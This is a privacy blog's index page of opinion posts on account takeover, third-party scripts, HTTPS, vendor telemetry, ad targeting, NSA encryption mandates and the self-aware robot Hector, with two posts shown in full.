Facebook is just the distraction from the real threat

The “Facebook problem” is real and it’s bad.  Whatever else you get from this, I’m not trying to play down the impact and continuing risk of data custodians who betray our trust.

It’s just that in the greater scheme of things, account takeover is much more dangerous, much easier to implement, verified to be ubiquitous on the web today, and yet is almost completely unreported.  We should address this and the Facebook problem but if we can do only one it should be this one.  This post explains why, and how I’ve tried to address it over time.

[Read more…]

All Your Accounts Are Belong To Us

Would you give your account ID, password, account numbers, email address, home address, and all your other sensitive personal information to random strangers? No? Are you sure? Scripts embedded in a web page or app allow the script provider to record every keystroke and every mouse movement you make on the page.

So why are so many of the scripts on account management pages hosted by 3rd parties?

[Read more…]

In defense of HTTPS Everywhere

Today Doc Searls reposted Dave Winer’s three part post challenging the need for HTTPS Everywhere.  Dave writes:

There’s no doubt it will serve to crush the independent web, to the extent that it still exists. It will only serve to drive bloggers into the silos.

Some pretty strong claims from Dave and his posts are worth a read.  They come, in my opinion, to an entirely wrong conclusion despite some valid points and a “sky is falling” delivery.  Why wrong?  Consider how you might prioritize security in a software development project.  This is something I tell my consulting clients but I’m going to give it to you for free:

[Read more…]

Enable-Javascript.com

Today for the first time, a web site I visited directed me to http://www.enable-javascript.com/  The site is supposed to be a service for webmasters who need an easy and accurate way to tell site visitors how to enable Javascript in the browser.  Though at first glance that may seem like a great idea and a useful service, it is just the opposite.

This is bad on so many levels.

[Read more…]

Vendor entitlement run amok

My main issue with vendors turning us into instrumented data sources isn’t the data so much as the lack of consent. My Fitbit knows a lot about me but it’s an add-on that I self-selected and it provides value to me. The tracking in my browser is not something I can easily avoid since the browser is now an integral part of my life. Between those extremes there are lots of IoT devices that you can currently choose a private version but where that choice is rapidly disappearing. You can still buy a dumb light switch but not a dumb car, for example. Your shiny new GT phones home.

Among the vendors who seem to feel an entitlement to our data is Microsoft, whose Windows 10 is basically a box of spyware disguised as a user-productivity-gaming-and-cat-video-watching platform. I’ve already written about the issues there, how to mitigate them, and the disheartening number of those “features” that can’t be disabled. Yet as bad as all that is, this latest revelation still managed to surprise me across several metrics: the lack of consent, the extent of the invasion, the degree of exposure, the fact that it’s already been exploited to infect user devices, the fact that the entity who exploited it is a “legitimate” vendor, and the fact that said “legitimate” vendor egregiously exposed the exploit to the Internet. [Read more…]

Apple applies for patent to deliver ads based on credit status

In USPTO Application 20150199725, Apple describes a system for targeting advertisements “based on the amount of pre-paid credit available to each user.”  The application goes on to say that “An advantage of such targeted advertising is that only advertisements for goods and services which particular users can afford, are delivered to these users.”

I’m unhappy with this for a few reasons.  My first objection is that the human-readable description on the application is deceptive.  Your pre-paid balance is not an indicator of what you “can afford.” For example, if you deposit $X each week for your college kid’s expenses, that balance on the card doesn’t mean (s)he can “afford” luxury products costing $X or less. If you are me, it means they can afford ramen noodles, paper, pens and not much else.

[Read more…]

The nightmare of easy and simple

The instrumented waste bin I predicted at the San Francisco Personal Data meetup a couple years back is now a thing.  While researching GeniCan I naturally had to go read their privacy policy.  It was there that I stumbled onto a service that lets you generate a privacy policy from a workflow.  You fill in some data and select from several options, it generates a custom policy from an inventory of templates that it fills in and assembles.  It can make policies for your web site, Facebook app or mobile app. Easy. Simple. Free.

Sounds awesome, right?

You were waiting for the “but”?

[Read more…]

Better surveys = better signal

I’ve spilled many bits in this blog about the difference between vendor-driven creepy malvertising ad-tech versus consumer-driven intentcasting and Vendor Relationship management.  The vendor-driven model is the one where you are surveilled from all sides and the data compiled, analyzed, sliced, diced, massaged, correlated and enhanced until the vendor has a good idea to which things you will respond viscerally and then attempt to manipulate you with them.  This model is based on exploitation of human biases and vigilance fatigue. Vendor Relationship Management (VRM) on the other hand is about the consumer broadcasting intent and preferences to a market that can respond accordingly.  This model is based on fulfillment of the consumer’s self-directed interests and desires.

Somewhere in the middle are consumer surveys: direct customer input, wholly vendor driven.  Or at least many people, vendors and customers alike, think these are somewhere in the middle.  Me?  I’m a sucker for surveys since they are about as close to VRM as it gets most of the time these days.  I fill them out in bulk in hopes of detecting some whiff of VRM in one of them, and now and then I’m rewarded for my effort.  But only once in a blue moon.  Sadly, virtually all surveys I’ve seen fail to rise to a level that might qualify as anything close to VRM and most are just plain clueless.

[Read more…]

Forget back doors, the NSA wants to mandate a front door

In their never-ending quest to eavesdrop on you, the NSA now wants to mandate that all encrypted communications must allow them access.  As Joel Hruska explains in an article in Extreme Tech, there are many reasons why this will not work.  The two big ones are that it isn’t possible to guarantee only authorized government agents will use the access, and because we currently have no effective means of oversight and accountability.

Dean Landsman recently posed the question “how does one go about preventing/protecting or just enabling security against such intrusion?”  The only answer is to do so in the legislature and in the various international bodies.  If the NSA proposals and others of its ilk become law, products like Blackphone and Qredo will become illegal.  However, this will not stop criminals from using crypto that the government cannot break and which is readily available.  It is true in the most literal sense that when unbreakable crypto is outlawed, only outlaws will have unbreakable crypto.

Considering the triviality of obtaining unbreakable crypto, only law-abiding citizens will use the NSA-accessbile stuff.  Combine that with the power imbalance inherent in such a scheme and the inevitable conclusion is this:

Of all possible uses to which such a law can be put, the only ones we can predict with 100% confidence to be implemented are those that abuse the privacy of law-abiding citizens.

The corollary to this is that the higher value a criminal target, the more likely they are to use readily available unbreakable crypto.  That means the people the government most wants to catch are those least likely to be vulnerable to eavesdropping if the proposed legislation is enacted.  Such a law would be unfit for its stated purpose.  It would be broken at birth, defective by design.

There are a few possible technological controls that can be imposed.  For example, when using blinded tokens it is possible to design them in such a way that they can be un-blinded but doing so is detectable.  It is doubtful any government would agree to using that technology though, since their investigation would revealed immediately upon the unblinding of the token.

However, even if enforceable accountability were implemented as a compromise, the government’s strategy could be to simply unblind everything.  Sort of a mass Denial-of-Privacy attack.  Or perhaps a Denial-of-Privacy-Enhancement (DOPE) attack if you want the acronym to accurately describe the people who would do such a thing.

This also illustrates one of the primary weapons brought to bear against personal liberty around the world: fatigue.  All that is necessary to pass such laws is to keep submitting them to the legislature.  The people impacted will object the first time.  A few less of them the second time.  When it comes down to just the die-hard activists, the legislature can be confident they are one bill away from victory.

Thomas Jefferson once said “The tree of liberty must be refreshed from time to time with the blood of patriots and tyrants.”  That was before digital communications were invented.  Can we perhaps try to refresh the tree of liberty with a call or FAX to our representative before we go off and start killing people?

Intentcasting…to a roach?

OK, so it’s a robot and not a roach. But it is a robot that *looks* a lot like a roach. Researchers at Bielefeld University are experimenting with emergent behavior on a robot platform they named Hector. Their software thus far has been reactive. The new software aims to give the robot “what if” capabilities to solve problems it has not been programmed for. This would imbue the robot with independent goal-directed behavior – i.e. robot intentions.

But beyond that, “they have now developed a software architecture that could enable Hector to see himself as others see him.” In other words, they gave it theory of mind and their ultimate goal is for it to be able to sense the intentions of humans and take these into account when formulating responses and actions. They want it to be self-aware. Though the rest of the world will probably see in this the parallels to Skynet of Terminator fame, the more interesting part to me is the notion that it will sense human intention.

Perhaps this is because the current crop of “smart” devices seems very autistic to me.  Though they have a wide range of apparent intelligence, they respond only to what they can directly sense, and only within a context of which they are the center.  The inability to make inferences about humans, and in particular to understand their intentions, is a typically autistic cognitive deficit.  While it is possible to emulate this to some extent, it is often perceived as inauthentic and creepy, which may be why I write about it so much.

Bielefeld University's Hector robot

Bielefeld University’s robot Hector is close to being self-aware

The quest by the marketing industry to provide targeted messaging tailored to your specific interests and intentions very much parallels the autistic experience.  Any given product or brand seeks to better understand how it is perceived by humans.  Or to put it another way, products and brands lack theory of mind and the ability to infer human emotions and intentions from non-verbal communication.  Like any autistic person, they attempt to mitigate their cognitive deficits by gathering data, observing reactions, forming a model of human behavior, calculating appropriate responses, then improving data sources and refining the model over time.  When humans do this we call it vocational training and independence skills.  When vendors do this we call it ad-tech.  Both groups tend to wonder why people at large often perceive it as creepy.

Hector is essentially autistic.  With the addition if self-awareness and the ability to infer human intentions, Hector may cross the line to creepy.  We’ll find out shortly.

JTPhoneHome

JT (Jibo Terrestrial) phone home!

The consciousness of most of our iconic sci-fi robots like C3PO and Robbie was modeled after that of humans – it was self-contained and part of the robot itself. Even though the Star Wars bots could access the networked world, they didn’t send their sensor data back to a central mother ship to be interpreted, processed, and turned into instructions for the robot to follow, then transmitted back. Everything happened locally. Contrast this with our real-world robots that use the mother ship architecture. Siri, Cortana, Alexa, Google [x], Jibo, Pepper, etc. all phone home more often than ET.  If you use these products, their vendors have access to all the data they send back to the mother ship.  Because that data is potentially very valuable, it would be naive to believe that it will be discarded once its benefit to you  the user has been realized.

It remains to be seen how the software coming out of Bielefeld will work, but one hopes that some aspect of self-awareness will be so incompatible with latency as to strongly favor local processing. If that is true and the new robot architecture is more like science fiction of yesteryear than the science fact of today, there is some hope that someone, somewhere on the planet will finally use intention detection in a non-creepy way that primarily benefits the individual and not the vendor.  It might also give us insights that will improve the lives of autistic people by helping us learn to infer human behavior in non-creepy ways.

On the other hand, if you ever read about Hector in Ad Age, we are all doomed. Skynet will have awoken. And it will have a really good deal for you.

 

A version of this post which more deeply explores the autism connection is posted on my Ask-An-Aspie blog here.